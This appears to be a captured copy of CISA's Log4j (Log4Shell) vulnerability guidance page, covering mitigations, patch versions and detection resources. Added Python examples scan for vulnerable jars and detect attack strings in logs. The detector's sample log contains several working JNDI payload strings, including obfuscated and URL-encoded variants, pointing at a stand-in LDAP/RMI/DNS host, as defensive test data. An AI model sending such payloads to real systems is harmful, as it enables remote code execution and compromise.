Effective URL: https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance?utm_medium=email&_hsmi=195888150&_hsenc=p2ANqtz-8IW-8...
Submission: On December 16 via api from IE — Scanned from DE

TLP:WHITE

APACHE LOG4J VULNERABILITY GUIDANCE

Immediate Actions to Protect Against Log4j Exploitation
• Discover all internet-facing assets that accept data inputs and use the Log4j
Java library anywhere in the stack.
• Discover all assets that use the Log4j library.
• Update or isolate affected assets. Assume compromise, identify common
post-exploit sources and activity, and hunt for signs of malicious activity.
• Monitor for odd traffic patterns (e.g., JNDI LDAP/RMI outbound traffic, DMZ
systems initiating outbound connections).
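Finding every copy of Log4j is the hard part of the first two actions above: log4j-core is routinely bundled inside wars, ears and fat jars, so a filename search misses most of it. The following is an added example (not CISA's tooling and not from the CISA GitHub repository) that walks a directory tree, opens every zip-format archive, recurses into archives nested inside it, reads the version from the jar's own META-INF pom.properties, and reports whether JndiLookup.class is still present, which is how you confirm that the zip -d workaround described later on this page was actually applied. The sample jars it scans are constructed in a temporary directory and contain only the two entries the scanner looks at; the status names (vulnerable/mitigated/fixed/unknown) and the 2.16.0 cut-off follow this page's guidance.

```python
"""Find Log4j 2 core jars on disk, including jars nested inside wars, ears and
fat jars, and report version plus whether JndiLookup.class is still present."""
import io
import os
import re
import tempfile
import zipfile

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 1); '2.0-beta9' -> (2, 0, 0, 0). The last field
    orders pre-releases before the final release of the same number."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(-\w+)?", text.strip())
    if not m:
        return None
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1)

def classify(version, jndi_present):
    """Status of one log4j-core jar, following this page's guidance."""
    if version is None or version[0] != 2:
        return "unknown"      # no version found, or Log4j 1.x (different code base)
    if version >= (2, 16, 0, 1):
        return "fixed"        # 2.16.0 disables JNDI and removes message lookups
    # 2.0-beta9 .. 2.15.0: CVE-2021-44228 and/or CVE-2021-45046
    return "mitigated" if not jndi_present else "vulnerable"

def scan_archive(data, path, findings):
    """Inspect one zip-format archive held in memory, recursing into nested ones."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.M)
            raw = m.group(1).strip() if m else "?"
            jndi = JNDI_CLASS in names
            findings.append((path, raw, jndi, classify(parse_version(raw) if m else None, jndi)))
        elif JNDI_CLASS in names:
            # Shaded/relocated build without pom.properties: version unknown, class present
            findings.append((path, "?", True, "unknown"))
        for name in names:
            if name.lower().endswith(ARCHIVE_EXT):
                scan_archive(zf.read(name), f"{path}!/{name}", findings)

def scan_tree(root):
    """Scan every archive under root: [(path, version, jndi_present, status), ...]."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            if fn.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    scan_archive(fh.read(), full, findings)
    return findings

def _make_jar(version, include_jndi):
    """Constructed stand-in for log4j-core-<version>.jar (test data, not a real
    artifact): just pom.properties and, optionally, a dummy JndiLookup.class."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()

def build_sample_tree(root):
    """Constructed layout: a 2.14.1 jar, the same jar with JndiLookup removed
    (the zip -d workaround), a 2.16.0 jar, and a war nesting the 2.14.1 jar."""
    lib = os.path.join(root, "lib")
    os.makedirs(lib)
    for fn, data in (("log4j-core-2.14.1.jar", _make_jar("2.14.1", True)),
                     ("log4j-core-2.14.1-stripped.jar", _make_jar("2.14.1", False)),
                     ("log4j-core-2.16.0.jar", _make_jar("2.16.0", True))):
        with open(os.path.join(lib, fn), "wb") as fh:
            fh.write(data)
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _make_jar("2.14.1", True))
    with open(os.path.join(root, "app.war"), "wb") as fh:
        fh.write(war.getvalue())

def demo():
    """Scan the constructed tree; returns {relative path: status}."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return {p[len(root) + 1:]: status for p, _, _, status in scan_tree(root)}

if __name__ == "__main__":
    for path, status in sorted(demo().items()):
        print(f"{status:10s} {path}")
```

On a real host, call scan_tree() on the application roots and the JVM's library directories rather than demo(). Two limits worth knowing: a shaded jar that relocates the package or drops pom.properties is reported as "unknown", and a jar that is only on disk but never on a running JVM's classpath still shows up, so cross-check hits against running processes before declaring an asset clean or exposed.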


SUMMARY

Note: CISA will continue to update this webpage as well as our community-sourced
GitHub repository as we have further guidance to impart and additional vendor
information to provide.

CISA and its partners, through the Joint Cyber Defense Collaborative, are
responding to active, widespread exploitation of a critical remote code
execution (RCE) vulnerability (CVE-2021-44228) in Apache’s Log4j software
library, versions 2.0-beta9 to 2.14.1, known as "Log4Shell" and "Logjam." Log4j
is very broadly used in a variety of consumer and enterprise services, websites,
and applications—as well as in operational technology products—to log security
and performance information. An unauthenticated remote actor could exploit this
vulnerability to take control of an affected system.

 * On December 10, 2021, Apache released Log4j version 2.15.0 in a security
   update to address the CVE-2021-44228 vulnerability.
 * (Updated December 15, 2021) On December 13, 2021, Apache released Log4j
   version 2.16.0 in a security update to address the CVE-2021-45046
   vulnerability. A remote attacker can exploit this second Log4j vulnerability
   to cause a denial-of-service (DoS) condition in certain non-default
   configurations.
   * Note: affected organizations that have already upgraded to Log4j 2.15.0
     will need to upgrade to Log4j 2.16.0 to be protected against both
     CVE-2021-44228 and CVE-2021-45046.

For these vulnerabilities to be remediated in products and services that use
affected versions of Log4j, the maintainers of those products and services must
implement these security updates. Users of such products and services should
refer to the vendors of these products/services for security updates. Given the
severity of the vulnerabilities and the likelihood of an increase in
exploitation by sophisticated cyber threat actors, CISA urges vendors and users
to take the following actions.

 * Vendors
   * (Updated December 15, 2021) Immediately identify, mitigate, and update
     affected products using Log4j to version 2.16.0. Note: as stated above,
     affected organizations will need to upgrade to Log4j 2.16.0 to be protected
     against both CVE-2021-44228 and CVE-2021-45046.
   * Inform your end users of products that contain these vulnerabilities and
     strongly urge them to prioritize software updates.
 * Affected Organizations
   * In addition to the immediate actions detailed in the box above, review
     CISA's GitHub repository for a list of affected vendor information and
     apply software updates as soon as they are available. See Actions for
     Organizations Running Products with Log4j below for additional guidance.
     Note: CISA has added CVE-2021-44228 to the Known Exploited Vulnerabilities
     Catalog, which was created according to Binding Operational Directive
     (BOD) 22-01: Reducing the Significant Risk of Known Exploited
     Vulnerabilities. In accordance with BOD 22-01, federal civilian executive
     branch agencies must mitigate CVE-2021-44228 by December 24, 2021.


TECHNICAL DETAILS

The CVE-2021-44228 RCE vulnerability—affecting Apache’s Log4j library, versions
2.0-beta9 to 2.14.1—exists in the action the Java Naming and Directory Interface
(JNDI) takes to resolve variables. According to the CVE-2021-44228 listing,
affected versions of Log4j contain JNDI features—such as message lookup
substitution—that "do not protect against adversary-controlled LDAP [Lightweight
Directory Access Protocol] and other JNDI related endpoints."

 * (Updated December 15, 2021) Note: the Apache Log4j version 2.16.0 security
   update that addresses the CVE-2021-45046 vulnerability disables JNDI by
   default and removes support for message lookups.

An adversary can exploit CVE-2021-44228 by submitting a specially crafted
request to a vulnerable system. If any part of that request reaches a Log4j log
statement, the JNDI lookup contacts an adversary-controlled LDAP or other JNDI
endpoint, which returns code the system then executes, giving the adversary full
control over the system. The adversary can then steal information, launch
ransomware, or conduct other malicious activity.


ACTIONS FOR ORGANIZATIONS RUNNING PRODUCTS WITH LOG4J

CISA recommends affected entities:

 * Review Apache’s Log4j Security Vulnerabilities page for additional
   information and, if appropriate, apply the provided workaround:
   * In releases >=2.10, this behavior can be mitigated by setting either the
     system property log4j2.formatMsgNoLookups or the environment variable
     LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
   * For releases from 2.7 through 2.14.1 all PatternLayout patterns can be
     modified to specify the message converter as %m{nolookups} instead of just
     %m.
   * For releases from 2.0-beta9 to 2.7, the only mitigation is to remove the
     JndiLookup class from the classpath: zip -q -d log4j-core-*.jar
     org/apache/logging/log4j/core/lookup/JndiLookup.class.
 * Apply available patches immediately. See CISA's GitHub repository for known
   affected products and patch information.
   * Prioritize patching, starting with mission critical systems,
     internet-facing systems, and networked servers. Then prioritize patching
     other affected information technology and operational technology assets.
   * Until patches are applied, set log4j2.formatMsgNoLookups to true by adding
     -Dlog4j2.formatMsgNoLookups=true to the Java Virtual Machine command for
     starting your application. Note: this may impact the behavior of a system’s
     logging if it relies on Lookups for message formatting. This mitigation
     only works for versions 2.10 and above, and CVE-2021-45046 showed that it
     is incomplete in certain non-default configurations (for example, a
     PatternLayout that includes Thread Context Map data, where
     attacker-controlled values can still reach a lookup); treat it as a
     stopgap and upgrade to 2.16.0.
   * As stated above, BOD 22-01 directs federal civilian agencies to mitigate
     CVE-2021-44228 by December 24, 2021, as part of the Known Exploited
     Vulnerabilities Catalog.
 * Conduct a security review to determine if there is a security concern or
   compromise. The log files for any services using affected Log4j versions will
   contain user-controlled strings, so the exploit strings themselves (and their
   obfuscated variants) are a starting point for hunting.
 * Consider reporting compromises immediately to CISA and the FBI.
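The security review above turns on the fact that the attacker's lookup string is written to the log before (or whether or not) it is resolved, so the logs of any exposed service are the first place to hunt. Searching for the literal "${jndi:" misses most real attempts, because attackers nest Log4j's own lookups to hide it. The following is an added example (not CISA's detection content and not one of the vendor rule sets listed below) that URL-decodes each line, collapses nested lookups from the inside out (${lower:j}, ${upper:n}, ${::-j}, ${env:MISSING:-j}) until the plain ${jndi:protocol:target} form appears, and reports the protocol and target for each hit. The access-log lines it runs over are constructed for the example and use TEST-NET addresses.

```python
"""Flag Log4Shell (CVE-2021-44228) lookup strings in log lines, including the
common obfuscations attackers use to hide ${jndi:...}."""
import re
from urllib.parse import unquote

# A lookup with no other lookup nested inside it, e.g. ${lower:j} or ${::-j}
INNER = re.compile(r"\$\{([^${}]*)\}")
# The fully de-obfuscated form: ${jndi:<protocol>:<target>}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:([^}]*)\}", re.I)

def _resolve(m):
    """Replace one innermost lookup with the text it would evaluate to."""
    body = m.group(1)
    if body.lower().lstrip().startswith("jndi:"):
        return m.group(0)             # keep the JNDI lookup itself intact
    if ":-" in body:                  # ${::-j}, ${env:NOPE:-j}: default-value syntax
        return body.split(":-", 1)[1]
    if ":" in body:                   # ${lower:j}, ${upper:n}: the argument
        return body.split(":", 1)[1]
    return ""                         # ${foo}: unknown lookup, contributes nothing

def normalize(text, max_rounds=10):
    """Undo (double) URL encoding, then collapse nested lookups from the inside
    out until nothing changes; bounded so hostile input cannot loop forever."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        new = INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text

def detect(line):
    """Return [(protocol, target), ...] for every JNDI lookup in one line."""
    return [(p.lower(), t.strip()) for p, t in JNDI.findall(normalize(line))]

def scan_lines(lines):
    """Run detect() over a log; returns (line number, protocol, target) hits."""
    return [(n, p, t) for n, line in enumerate(lines, 1) for p, t in detect(line)]

# Constructed sample access-log lines (TEST-NET addresses, not real traffic).
SAMPLE_LOG = [
    # benign request
    '203.0.113.10 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # plain payload in the User-Agent header
    '203.0.113.11 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.5:1389/a}"',
    # case and nesting obfuscation: ${lower:}, ${upper:} and ${::-x} default values
    '203.0.113.12 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${::-l}${::-d}${::-a}${::-p}://203.0.113.5:1389/b}"',
    # URL-encoded payload in the request path, RMI this time
    '203.0.113.13 - - [10/Dec/2021:12:00:04 +0000] '
    '"GET /?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.5%3A1099%2Fc%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
    # default-value trick on an environment variable that does not exist
    '203.0.113.14 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NOPE:-j}ndi:dns://203.0.113.5/d}"',
]

if __name__ == "__main__":
    for n, proto, target in scan_lines(SAMPLE_LOG):
        print(f"line {n}: jndi via {proto} -> {target}")
```

Feed real logs with scan_lines(open(path)). The protocol field is what to pivot on: ldap, ldaps and rmi hits indicate a code-fetch attempt and should be matched against outbound connection logs from the same host (the outbound LDAP/RMI traffic the box at the top of this page tells you to watch for), while dns hits are usually reconnaissance that tells the attacker the host is vulnerable. Lookups such as ${date:...} or ${hostname} are legitimate inside Log4j configuration files, but there is no benign reason for one to arrive inside an HTTP header or query string.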


RESOURCES

This information is provided “as-is” for informational purposes only. CISA does
not endorse any company, product, or service referenced below.


ONGOING LIST OF IMPACTED PRODUCTS AND DEVICES

CISA is maintaining a community-sourced GitHub repository that provides a list
of publicly available information and vendor-supplied advisories regarding the
Log4j vulnerability.


ONGOING SOURCES FOR DETECTION RULES

CISA will update sources for detection rules as we obtain them.

For detection rules, see Florian Roth's GitHub page, log4j RCE Exploitation
Detection. Note: due to the urgency to share this information, CISA has not yet
validated this content.

For a list of hashes to help determine if a Java application is running a
vulnerable version of Log4j, see Rob Fuller's GitHub page,
CVE-2021-44228-Log4Shell-Hashes. Note: due to the urgency to share this
information, CISA has not yet validated this content.


MITIGATION GUIDANCE FROM JCDC PARTNERS

 * Microsoft blog: Guidance for Preventing, Detecting, and Hunting for
   CVE-2021-44228 Log4j 2 Exploitation
 * Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: Threat
   Advisory: Critical Apache Log4j vulnerability being exploited in the wild
 * Palo Alto Networks blog: Apache log4j Vulnerability CVE-2021-44228: Analysis
   and Mitigations
 * CrowdStrike blog: Log4j2 Vulnerability Analysis and Mitigation
   Recommendations
 * IBM Security Intelligence blog: How Log4j Vulnerability Could Impact You
 * Tenable blog: CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j
   Remote Code Execution Vulnerability Available (Log4Shell)
 * Broadcom's Symantec Enterprise blog: Apache Log4j Zero-Day Being Exploited in
   the Wild
 * Splunk's blog: Log4Shell - Detecting Log4j Vulnerability (CVE-2021-44228)
   Continued
 * VMware Blog: Log4j Vulnerability Security Advisory: What You Need to Know
 * VMware Threat Research: Investigating CVE-2021-44228 Log4Shell Vulnerability
 * Cloudflare Blog: CVE-2021-44228 - Log4j RCE 0-day mitigation

ADDITIONAL RESOURCES

 * Joint Cybersecurity Advisory – Technical Approaches to Uncovering and
   Remediating Malicious Activity provides general incident response guidance.
 * NIST Special Publication 800-40 Revision 3, Guide to Enterprise Patch
   Management Technologies offers more information on the basics of enterprise
   patch management technologies.
 * CISA’s Cyber Essentials serve as a guide for leaders of small businesses as
   well as leaders of small and local government agencies to develop an
   actionable understanding of where to start implementing organizational
   cybersecurity practices.
 * CISA offers a range of no-cost cyber hygiene services—including vulnerability
   scanning and ransomware readiness assessments—to help critical infrastructure
   organizations assess, identify, and reduce their exposure to cyber threats.
 * New Zealand Computer Emergency Response Team’s Advisory: Log4j RCE 0-Day
   Actively Exploited
 * Canadian Centre for Cyber Security Alert: Active Exploitation of Apache Log4j
   Vulnerability
 * United Kingdom National Cyber Security Centre Alert: Apache Log4j
   vulnerability (CVE-2021-44228)
 * Australian Cyber Security Centre Alert: Critical remote code execution
   vulnerability found in Apache Log4j2 library
 * Australian Cyber Security Centre Advisory: 2021-007: Apache Log4j2
   vulnerability – advice and mitigations
 * F5 Security Update: Apache Log4j2 Remote Code Execution vulnerability
   CVE-2021-44228
 * Qualys blog: CVE-2021-44228: Apache Log4j2 Zero-Day Exploited in the Wild
   (Log4Shell)
 * Royce Williams’s Tech Solvency blog: Log4Shell log4j vulnerability
   (CVE-2021-44228 / CVE-2021-45046) - cheat-sheet reference guide


CONTACT US

(888)282-0870
